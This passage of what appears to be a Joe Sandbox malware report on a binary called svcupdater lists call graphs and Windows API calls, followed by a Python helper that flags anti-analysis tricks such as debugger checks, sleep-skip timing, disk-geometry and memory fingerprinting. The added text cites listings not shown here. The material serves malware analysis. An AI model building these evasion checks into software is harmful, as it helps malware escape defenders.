                                                                                                     control_flow_graph 911 c104d7-c10507 call c10225 914 c10522-c1052e call c0b512 911->914 915 c10509-c10514 call bfe7e0 911->915 921 c10530-c10545 call bfe7e0 call bfe7f3 914->921 922 c10547-c10590 call c10190 914->922 920 c10516-c1051d call bfe7f3 915->920 932 c107fc-c10800 920->932 921->920 930 c10592-c1059b 922->930 931 c105fd-c10606 GetFileType 922->931 934 c105d2-c105f8 GetLastError call bfe799 930->934 935 c1059d-c105a1 930->935 936 c10608-c10639 GetLastError call bfe799 CloseHandle 931->936 937 c1064f-c10652 931->937 934->920 935->934 941 c105a3-c105d0 call c10190 935->941 936->920 948 c1063f-c1064a call bfe7f3 936->948 939 c10654-c10659 937->939 940 c1065b-c10661 937->940 944 c10665-c106b3 call c0b45d 939->944 940->944 945 c10663 940->945 941->931 941->934 954 c106d2-c106fa call c0ff42 944->954 955 c106b5-c106c1 call c1039f 944->955 945->944 948->920 960 c106fc-c106fd 954->960 961 c106ff-c10740 954->961 955->954 962 c106c3 955->962 963 c106c5-c106cd call c03873 960->963 964 c10761-c1076f 961->964 965 c10742-c10746 961->965 962->963 963->932 968 c10775-c10779 964->968 969 c107fa 964->969 965->964 967 c10748-c1075c 965->967 967->964 968->969 971 c1077b-c107ae CloseHandle call c10190 968->971 969->932 974 c107b0-c107dc GetLastError call bfe799 call c0b625 971->974 975 c107e2-c107f6 971->975 974->975 975->969
                                                                                                    APIs
                                                                                                      • Part of subcall function 00C10190: CreateFileW.KERNELBASE(?,00000000,?,00C10580,?,?,00000000,?,00C10580,?,0000000C), ref: 00C101AD
                                                                                                    • GetLastError.KERNEL32 ref: 00C105EB
                                                                                                    • __dosmaperr.LIBCMT ref: 00C105F2
                                                                                                    • GetFileType.KERNELBASE(00000000), ref: 00C105FE
                                                                                                    • GetLastError.KERNEL32 ref: 00C10608
                                                                                                    • __dosmaperr.LIBCMT ref: 00C10611
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00C10631
                                                                                                    • CloseHandle.KERNEL32(00C07BEE), ref: 00C1077E
                                                                                                    • GetLastError.KERNEL32 ref: 00C107B0
                                                                                                    • __dosmaperr.LIBCMT ref: 00C107B7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                     • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                     • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                     • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                     • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                    • String ID: H
                                                                                                    • API String ID: 4237864984-2852464175
                                                                                                    • Opcode ID: 4d92700db6a8b16064b43e21126af98907ed42bf4d3fbf26f3b0af5f243bebff
                                                                                                    • Instruction ID: 8a4ff302017e2c29605a4cbe3b4076a7283bfc9d506af973c1bd75fb73f60d52
                                                                                                    • Opcode Fuzzy Hash: 4d92700db6a8b16064b43e21126af98907ed42bf4d3fbf26f3b0af5f243bebff
                                                                                                    • Instruction Fuzzy Hash: DAA13532A101599FCF19AF68DC51BED3BA1AF47320F240189F821DB2E1C7749D92EB91

                                                                                                     Control-flow Graph (basic blocks as start-end addresses with the APIs they call; a->b is an edge)
                                                                                                     control_flow_graph 1176 be3b60-be3b8d GetSystemInfo 1177 be3c64-be3c77 call bf53be 1176->1177 1178 be3b93-be3bb8 GlobalMemoryStatusEx 1176->1178 1178->1177 1180 be3bbe-be3bcb 1178->1180 1182 be3bd3-be3bde 1180->1182 1182->1182 1183 be3be0-be3c2a CreateFileA DeviceIoControl call bf5a20 1182->1183 1185 be3c2f-be3c63 call bf5a20 call c12ca0 call bf53be 1183->1185
                                                                                                    APIs
                                                                                                    • GetSystemInfo.KERNELBASE(?), ref: 00BE3B7F
                                                                                                    • GlobalMemoryStatusEx.KERNELBASE(?), ref: 00BE3BA0
                                                                                                    • CreateFileA.KERNELBASE(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00BE3BF6
                                                                                                    • DeviceIoControl.KERNELBASE(00000000,00070000,00000000,00000000,?,00000018,?,00000000), ref: 00BE3C14
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BE3C47
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                     • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                     • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                     • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                     • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ControlCreateDeviceFileGlobalInfoMemoryStatusSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                    • String ID: @
                                                                                                    • API String ID: 3398702251-2766056989
                                                                                                    • Opcode ID: f7ba6539da8738a3670119f154af3adc6167c9c634f8b2a199f9153167ed4cdd
                                                                                                    • Instruction ID: 7a12b9eefc5b4d5e4c6f7fe48c4374958000786b01527ab0e300a028ad4523c1
                                                                                                    • Opcode Fuzzy Hash: f7ba6539da8738a3670119f154af3adc6167c9c634f8b2a199f9153167ed4cdd
                                                                                                    • Instruction Fuzzy Hash: E2319570518344ABE720DB74CC4AFAFB7E8AF89704F50494CF789A6191DB74A148C756
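
The be3f90 listing above (IsDebuggerPresent, a Toolhelp32 process walk, NtDelayExecution resolved by name from ntdll and bracketed by two GetTickCount64 reads, which is the usual check for a sandbox that shortens sleeps) and the be3b60 listing (GetSystemInfo, GlobalMemoryStatusEx, then DeviceIoControl with control code 00070000 and a 0x18-byte output buffer, i.e. IOCTL_DISK_GET_DRIVE_GEOMETRY filling a DISK_GEOMETRY) record the same anti-analysis checks the Signatures section flags, as does the GetComputerNameA/GetUserNameA routine at the top of this section. The following Python is an added triage helper written for this page, not code from the report or from the sample: it parses lines in the report's "Api.MODULE(args), ref: ADDR" form and flags these patterns. It assumes that the second NtDelayExecution argument the report logs, FA0A1F00, is the low dword of the negative (relative) interval in 100 ns units, which would make the stall 10 s; the report does not state the interval, so treat that decoding as an interpretation. The sample inputs are lines copied from the listings above.

```python
"""Flag anti-analysis patterns in Joe Sandbox "APIs" listings.
Added helper written for this page; not part of the report or of the sample."""
import re

# One listing line: "• Api.MODULE(arg,arg), ref: ADDR"; the optional
# "Part of subcall function X:" prefix marks a call made from a callee.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>[A-Za-z0-9_@$?:~]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)")
TIMERS = {"GetTickCount", "GetTickCount64", "QueryPerformanceCounter", "timeGetTime"}
DELAYS = {"NtDelayExecution", "Sleep", "SleepEx"}
DEBUGGER = {"IsDebuggerPresent", "CheckRemoteDebuggerPresent"}
IOCTL_NAMES = {0x70000: "IOCTL_DISK_GET_DRIVE_GEOMETRY"}  # CTL_CODE(IOCTL_DISK_BASE, 0, ...)
PROCESS_ALL_ACCESS = 0x1FFFFF


def parse_listing(text):
    """Return the listed calls in address order (api, module, args, ref, subcall)."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            calls.append({"api": m["api"], "module": m["module"], "args": args,
                          "ref": int(m["ref"], 16), "subcall": m["sub"]})
    return sorted(calls, key=lambda c: c["ref"])


def hex_arg(args, i):
    """args[i] as a hex dword, or None when absent or unresolved ('?')."""
    try:
        return int(args[i], 16)
    except (IndexError, ValueError):
        return None


def nt_relative_delay_ms(arg):
    """Assumption: arg is the low dword of the negative LARGE_INTEGER handed to
    NtDelayExecution, i.e. a relative interval in 100 ns units (None if not negative)."""
    v = hex_arg([arg], 0)
    if v is None or v < 0x80000000:
        return None
    return (0x100000000 - v) * 100 / 1_000_000  # 100 ns ticks -> milliseconds


def analyze(text):
    """Return (kind, ref, detail) findings for one function's listing."""
    calls = parse_listing(text)
    direct = [c for c in calls if c["subcall"] is None]
    apis = {c["api"] for c in calls}
    found = []
    # Stalling with sleep-skip detection: a tick read right before and after the delay.
    for prev, cur, nxt in zip(direct, direct[1:], direct[2:]):
        if cur["api"] in DELAYS and prev["api"] in TIMERS and nxt["api"] in TIMERS:
            ms = nt_relative_delay_ms(cur["args"][1]) if len(cur["args"]) > 1 else None
            found.append(("timed_delay", cur["ref"], ms))
    for c in direct:
        resolved = [a for a in c["args"] if a in DELAYS]
        if c["api"].startswith("GetModuleHandle") and resolved:  # delay API resolved at run time
            found.append(("dynamic_delay_resolution", c["ref"], resolved[0]))
        if c["api"] == "DeviceIoControl" and hex_arg(c["args"], 1) is not None:
            code = hex_arg(c["args"], 1)
            found.append(("disk_ioctl", c["ref"], IOCTL_NAMES.get(code, hex(code))))
        if c["api"] == "OpenProcess" and hex_arg(c["args"], 0) == PROCESS_ALL_ACCESS:
            found.append(("open_process", c["ref"], "PROCESS_ALL_ACCESS"))
    if apis & DEBUGGER:
        found.append(("debugger_check", None, sorted(apis & DEBUGGER)))
    if {"CreateToolhelp32Snapshot", "Process32FirstW"} <= apis:
        found.append(("process_enumeration", None, "Toolhelp32"))
    if {"GetSystemInfo", "GlobalMemoryStatusEx"} <= apis:
        found.append(("hardware_fingerprint", None, "cpu+memory"))
    if any(a.startswith("GetComputerName") for a in apis) and any(a.startswith("GetUserName") for a in apis):
        found.append(("host_identity", None, "computer+user"))
    return found


# Sample inputs: listing lines copied from the report above.
BE3F90_LISTING = """
• IsDebuggerPresent.KERNEL32(2F4C7F60,?,00000044), ref: 00BE3FBA
  • Part of subcall function 00BE3F90: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,2F4C7F60), ref: 00BE3D42
  • Part of subcall function 00BE3F90: Process32FirstW.KERNEL32(00000000,?), ref: 00BE3D6B
• GetModuleHandleW.KERNEL32(ntdll.dll,NtDelayExecution,?,00000044), ref: 00BE3FE7
• GetProcAddress.KERNEL32(00000000), ref: 00BE3FEE
• GetTickCount64.KERNEL32 ref: 00BE3FFA
• NtDelayExecution.NTDLL(00000000,FA0A1F00), ref: 00BE4016
• GetTickCount64.KERNEL32 ref: 00BE4018
"""
BE3B60_LISTING = """
• GetSystemInfo.KERNELBASE(?), ref: 00BE3B7F
• GlobalMemoryStatusEx.KERNELBASE(?), ref: 00BE3BA0
• DeviceIoControl.KERNELBASE(00000000,00070000,00000000,00000000,?,00000018,?,00000000), ref: 00BE3C14
"""
HOST_LISTING = """
• GetComputerNameA.KERNEL32(?,?), ref: 00BE4D03
• GetUserNameA.ADVAPI32(?,000000FF), ref: 00BE4D17
"""

if __name__ == "__main__":
    for name, text in (("be3f90", BE3F90_LISTING), ("be3b60", BE3B60_LISTING), ("host", HOST_LISTING)):
        for kind, ref, detail in analyze(text):
            print(name, kind, "-" if ref is None else hex(ref), detail)
```

Run it on any "APIs" block of the report pasted into a string. The timing rule only fires on calls made directly by the function (the "Part of subcall" entries are excluded from the ordering but still count towards the set-based rules), which is why the be3f90 bracket is reported at 00BE4016 and the Toolhelp32 walk is reported separately.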

                                                                                                     Control-flow Graph (basic blocks as start-end addresses with the APIs they call; a->b is an edge)
                                                                                                     control_flow_graph 1192 be4350-be4452 call bf6f20 call be84a0 call be7570 1199 be4454-be4459 call bf47ac 1192->1199 1200 be44c5-be44e9 call be3a20 1192->1200 1203 be445e-be4463 1199->1203 1204 be44ee-be44fc 1200->1204 1203->1200 1205 be4465-be44ae call be7370 call be8930 call be7210 1203->1205 1206 be44fe-be4505 1204->1206 1207 be450a-be456a call be8890 call bfd2c0 OpenProcess 1204->1207 1205->1204 1234 be44b0-be44b9 1205->1234 1209 be45aa-be463c call be5bb0 call bf464d call bf53be 1206->1209 1219 be456c-be4578 1207->1219 1220 be4598-be45a6 1207->1220 1223 be458e-be4595 call bf564d 1219->1223 1224 be457a-be4588 1219->1224 1220->1209 1223->1220 1224->1223 1227 be463d-be46d9 call bf9dff call be5bb0 call bf464d 1224->1227 1234->1204 1240 be44bb-be44c3 1234->1240 1240->1204
                                                                                                    APIs
                                                                                                      • Part of subcall function 00BE84A0: std::locale::_Init.LIBCPMT ref: 00BE8532
                                                                                                      • Part of subcall function 00BE7570: std::locale::_Init.LIBCPMT ref: 00BE75C2
                                                                                                    • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,?,2F4C7F60), ref: 00BE4551
                                                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00BE4615
                                                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00BE46C1
                                                                                                      • Part of subcall function 00BE8930: std::_Lockit::_Lockit.LIBCPMT ref: 00BE8966
                                                                                                      • Part of subcall function 00BE8930: std::_Lockit::_Lockit.LIBCPMT ref: 00BE8988
                                                                                                      • Part of subcall function 00BE8930: std::_Lockit::~_Lockit.LIBCPMT ref: 00BE89A8
                                                                                                      • Part of subcall function 00BE8930: std::_Lockit::~_Lockit.LIBCPMT ref: 00BE89CF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                     • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                     • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                     • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                     • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Lockitstd::_$InitIos_base_dtorLockit::_Lockit::~_std::ios_base::_std::locale::_$OpenProcess
                                                                                                    • String ID: X
                                                                                                    • API String ID: 2479089509-3081909835
                                                                                                    • Opcode ID: a11da64449611ebe4e544a78d4b8e5dfa4e5347565735658c2744fd195c1ff23
                                                                                                    • Instruction ID: 2eca45fc5047825254425a888738d19d46d0dbee53c4159e177a22fd2a962b44
                                                                                                    • Opcode Fuzzy Hash: a11da64449611ebe4e544a78d4b8e5dfa4e5347565735658c2744fd195c1ff23
                                                                                                    • Instruction Fuzzy Hash: 9BA13C74900299DFDB20CF64C949BADBBF4FF04304F2485E9E509A7691DB74AA85CF50

                                                                                                     Control-flow Graph (basic blocks as start-end addresses with the APIs they call; a->b is an edge)
                                                                                                     control_flow_graph 1243 be4050-be4144 call bf6f20 call be84a0 call be7570 1250 be4146-be414b call bf47ac 1243->1250 1251 be41b5-be41d9 call be3a20 1243->1251 1254 be4150-be4155 1250->1254 1255 be41de-be4204 GetCurrentProcessId call be5f10 call be7480 1251->1255 1254->1251 1256 be4157-be41a0 call be7370 call be8930 call be7210 1254->1256 1264 be422f-be42bb call be5bb0 call bf464d call bf53be 1255->1264 1265 be4206-be422a call be3a20 1255->1265 1256->1255 1276 be41a2-be41a9 1256->1276 1265->1264 1276->1255 1279 be41ab-be41b3 1276->1279 1279->1255
                                                                                                    APIs
                                                                                                      • Part of subcall function 00BE84A0: std::locale::_Init.LIBCPMT ref: 00BE8532
                                                                                                      • Part of subcall function 00BE7570: std::locale::_Init.LIBCPMT ref: 00BE75C2
                                                                                                    • GetCurrentProcessId.KERNEL32(00000000,?,2F4C7F60), ref: 00BE41E5
                                                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00BE429A
                                                                                                      • Part of subcall function 00BE8930: std::_Lockit::_Lockit.LIBCPMT ref: 00BE8966
                                                                                                      • Part of subcall function 00BE8930: std::_Lockit::_Lockit.LIBCPMT ref: 00BE8988
                                                                                                      • Part of subcall function 00BE8930: std::_Lockit::~_Lockit.LIBCPMT ref: 00BE89A8
                                                                                                      • Part of subcall function 00BE8930: std::_Lockit::~_Lockit.LIBCPMT ref: 00BE89CF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                     • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                     • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                     • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                     • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Lockitstd::_$InitLockit::_Lockit::~_std::locale::_$CurrentIos_base_dtorProcessstd::ios_base::_
                                                                                                    • String ID: `
                                                                                                    • API String ID: 1043075861-2679148245
                                                                                                    • Opcode ID: 4f68c1237f8ee1bf6de48483f5691781d18f4251cf39e1a05a9e276a7c60d434
                                                                                                    • Instruction ID: 1b4b6cdfa96e121f55ae3df48d4651278e72ce0e773961cac9319ddba37b83b3
                                                                                                    • Opcode Fuzzy Hash: 4f68c1237f8ee1bf6de48483f5691781d18f4251cf39e1a05a9e276a7c60d434
                                                                                                    • Instruction Fuzzy Hash: C361E5B4901258DFEB10DF64D889F9ABBF4FB14304F1441E9E909AB291DB719A88CF40

                                                                                                     Control-flow Graph (basic blocks as start-end addresses with the APIs they call; a->b is an edge)
                                                                                                     control_flow_graph 1331 c03505-c03524 1332 c0352a-c0352c 1331->1332 1333 c036fe 1331->1333 1335 c03558-c0357e 1332->1335 1336 c0352e-c0354d call bf9d72 1332->1336 1334 c03700-c03704 1333->1334 1337 c03580-c03582 1335->1337 1338 c03584-c0358a 1335->1338 1342 c03550-c03553 1336->1342 1337->1338 1340 c0358c-c03596 1337->1340 1338->1336 1338->1340 1343 c035a6-c035b1 call c03052 1340->1343 1344 c03598-c035a3 call c07253 1340->1344 1342->1334 1349 c035f3-c03605 1343->1349 1350 c035b3-c035b8 1343->1350 1344->1343 1351 c03656-c03676 WriteFile 1349->1351 1352 c03607-c0360d 1349->1352 1353 c035ba-c035be 1350->1353 1354 c035dd-c035f1 call c02c18 1350->1354 1355 c03681 1351->1355 1356 c03678-c0367e GetLastError 1351->1356 1358 c03644-c0364f call c030d0 1352->1358 1359 c0360f-c03612 1352->1359 1360 c035c4-c035d3 call c02fea 1353->1360 1361 c036c6-c036d8 1353->1361 1371 c035d6-c035d8 1354->1371 1363 c03684-c0368f 1355->1363 1356->1355 1370 c03654 1358->1370 1364 c03632-c03642 call c03294 1359->1364 1365 c03614-c03617 1359->1365 1360->1371 1366 c036e2-c036f4 1361->1366 1367 c036da-c036e0 1361->1367 1372 c03691-c03696 1363->1372 1373 c036f9-c036fc 1363->1373 1377 c0362d-c03630 1364->1377 1365->1361 1374 c0361d-c03628 call c031ab 1365->1374 1366->1342 1367->1333 1367->1366 1370->1377 1371->1363 1378 c036c4 1372->1378 1379 c03698-c0369d 1372->1379 1373->1334 1374->1377 1377->1371 1378->1361 1382 c036b6-c036bf call bfe7bc 1379->1382 1383 c0369f-c036b1 1379->1383 1382->1342 1383->1342
                                                                                                    APIs
                                                                                                      • Part of subcall function 00C02C18: GetConsoleOutputCP.KERNEL32(2F4C7F60,00000000,00000000,00000000), ref: 00C02C7B
                                                                                                    • WriteFile.KERNEL32(?,00000000,?,00C24240,00000000,0000000C,00000000,00000000,?,00000000,00C24240,00000010,00BFC6A2,00000000,00000000,00000000), ref: 00C0366E
                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 00C03678
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 2915228174-0
                                                                                                    • Opcode ID: e7c0febf03c2cd5eb69acd5fc00d3290a3cb9b31093ab1df7095c6776ce772db
                                                                                                    • Instruction ID: 3ab787a5bff77ec8a5db79b4580b9822b47680899be8d692bf73092b8fa3c8cc
                                                                                                    • Opcode Fuzzy Hash: e7c0febf03c2cd5eb69acd5fc00d3290a3cb9b31093ab1df7095c6776ce772db
                                                                                                    • Instruction Fuzzy Hash: 3E618CB1D04189AEDF118FA9CC85AEEBBBDAF09304F144199F914A7292D732DB05DB60

Control-flow graph (executed / not-executed colouring lost in extraction; raw edge list omitted): function c030d0-c031aa; WriteFile at c0314f and GetLastError at c03192; subcalls bf5ff0, bf53be.
                                                                                                    APIs
                                                                                                    • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,00000000,?,00C03654,00000000,00000000,00000000,?,0000000C,00000000), ref: 00C0316C
                                                                                                    • GetLastError.KERNEL32(?,00C03654,00000000,00000000,00000000,?,0000000C,00000000,00000000,?,00000000,00C24240,00000010,00BFC6A2,00000000,00000000), ref: 00C03192
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 442123175-0
                                                                                                    • Opcode ID: a7cc06faab4be4832b2ca59eb891fdd47ec46a1c37ef698f2ff2375c2635bc97
                                                                                                    • Instruction ID: 034325ea3b9f136be42c6e6bad9d96b162f9dc328e4f6b44b3628342d909df60
                                                                                                    • Opcode Fuzzy Hash: a7cc06faab4be4832b2ca59eb891fdd47ec46a1c37ef698f2ff2375c2635bc97
                                                                                                    • Instruction Fuzzy Hash: 93219134A002599BCB19CF19DC80AEDB7FAEF4D301F2444AAEA46D7251D6309E46CB64

Control-flow graph (executed / not-executed colouring lost in extraction; raw edge list omitted): function c07baf-c07c31; no direct API calls; subcalls c07985, c104b7.
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __wsopen_s
                                                                                                    • String ID:
                                                                                                    • API String ID: 3347428461-0
                                                                                                    • Opcode ID: 9634f834abe76725c9ee6ceb3a944fe2018c04ff273847626e0ef1d172ca839f
                                                                                                    • Instruction ID: 4b628e82652574a9380001ee41f3524c48bebd77a343b5f61ead89746ee6022e
                                                                                                    • Opcode Fuzzy Hash: 9634f834abe76725c9ee6ceb3a944fe2018c04ff273847626e0ef1d172ca839f
                                                                                                    • Instruction Fuzzy Hash: 01115771A0420AAFCF09DF58E941A9F7BF5EF48304F154069F808EB251D630EA11CBA4

Control-flow graph (executed / not-executed colouring lost in extraction; raw edge list omitted): blocks bf53cc-bf53f7, with bf53f7 looping on itself, plus be1b30-be1b80; subcalls bfdcb6, c01945, be1b10, bf691b, bf63d1.
                                                                                                    APIs
                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00BE1B6E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ___std_exception_copy
                                                                                                    • String ID:
                                                                                                    • API String ID: 2659868963-0
                                                                                                    • Opcode ID: 0df8b0160422b706f39ffdb21ee33f1460b36bd8537345544f71aff4b76539d0
                                                                                                    • Instruction ID: b3d89a201618a8522c3928475c7d64a23d0c90a17f2ed37a5c45adba043323aa
                                                                                                    • Opcode Fuzzy Hash: 0df8b0160422b706f39ffdb21ee33f1460b36bd8537345544f71aff4b76539d0
                                                                                                    • Instruction Fuzzy Hash: 8D014E7140070D67CB24AFADDC419AA77ECDE01360B2085B5FF149B581FBB0E598C2D4

Control-flow graph (executed / not-executed colouring lost in extraction; raw edge list omitted): function c03ae9-c03b36; RtlAllocateHeap at c03b12; subcalls bfe7f3, c018fa, c01945.
                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,00BF63FB,?,?,?,?,?,00BE2EE7,?,?,?), ref: 00C03B1B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: 7616fa997d0ccd835f7f6778ed33e03e2a2e000d55a8d0e2107a30deaf7c6d66
                                                                                                    • Instruction ID: 8831571bd8fdbc7568f047d39aa87c18c43e9eb384adbfdbbc1f1d02967c42d3
                                                                                                    • Opcode Fuzzy Hash: 7616fa997d0ccd835f7f6778ed33e03e2a2e000d55a8d0e2107a30deaf7c6d66
                                                                                                    • Instruction Fuzzy Hash: 4DE092312052B1ABEB312AA69C02F6E764CEF467B4F150260AD659A0D1DF60CF01E2E9

Control-flow graph (executed / not-executed colouring lost in extraction; raw edge list omitted): single block c10190-c101b4 calling CreateFileW.
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNELBASE(?,00000000,?,00C10580,?,?,00000000,?,00C10580,?,0000000C), ref: 00C101AD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
